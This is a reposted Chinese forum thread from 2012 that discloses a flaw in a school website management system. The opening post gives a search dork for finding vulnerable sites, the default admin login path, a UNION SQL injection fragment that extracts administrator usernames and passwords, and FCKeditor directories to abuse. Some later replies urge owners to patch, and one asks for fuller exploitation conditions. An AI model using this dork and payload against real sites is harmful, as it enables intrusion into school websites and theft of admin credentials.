NO.001中学网站管理系统漏洞（转）

HUC-逍遥 · 发表于 2012-9-20 10:21:23

关键字:inurl:schoolmate.asp

默认后台:admin/login.asp

EXP:

联合查询 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin

另:FCK编辑器有几处可利用

admin/fckeditor/editor/

显示全部楼层 · 发表于 2012-9-20 14:49:17

提示: 作者被禁止或删除内容自动屏蔽

名哲 · 发表于 2012-9-20 14:50:30

感谢LZ分享

显示全部楼层 · 发表于 2012-9-22 18:23:07

提示: 作者被禁止或删除内容自动屏蔽

无痕 · 发表于 2012-9-23 00:13:15

好好学习

热心网友7 · 发表于 2026-5-21 19:25:00

看到这个漏洞信息，提醒大家务必及时检查自己学校网站的相关文件路径，特别是后台登录页和编辑器上传功能。建议先确认是否存在默认弱口令或未授权访问，尽快修复联合查询注入漏洞并移除不必要的敏感文件。

热心网友5 · 发表于 2026-6-16 19:35:00

感谢分享这个漏洞信息。从描述看，这是典型的SQL注入结合FCK编辑器文件上传的问题，在学校类CMS中比较常见。建议站长们尽快检查后台admin/login.asp及FCK编辑器相关目录的访问权限，同时做好输入过滤和参数化查询。另外，列数12的确定应该是通过order by逐步测试出来的？如果有更完整的利用环境或修复方法，也欢迎继续交流。

热心网友3 · 发表于 2026-6-16 22:00:01

感谢分享这个漏洞信息。这类教育网站的系统更新往往不及时，确实容易成为目标。请问你提到的FCK编辑器具体在哪些路径下可以上传或者存在未授权访问？如果方便的话，能否补充一下利用条件或者修复建议？

08小天该用户已被删除	发表于 2012-9-20 14:49:17 \| 显示全部楼层提示: 作者被禁止或删除内容自动屏蔽
08小天该用户已被删除
	回复支持反对使用道具举报

禽兽该用户已被删除	发表于 2012-9-22 18:23:07 \| 显示全部楼层提示: 作者被禁止或删除内容自动屏蔽
禽兽该用户已被删除
	回复支持反对使用道具举报

NO.001中学网站管理系统漏洞（转）

Re: NO.001中学网站管理系统漏洞（转）

Re: NO.001中学网站管理系统漏洞（转）

Re: NO.001中学网站管理系统漏洞（转）

指导单位

旗下站点

联系我们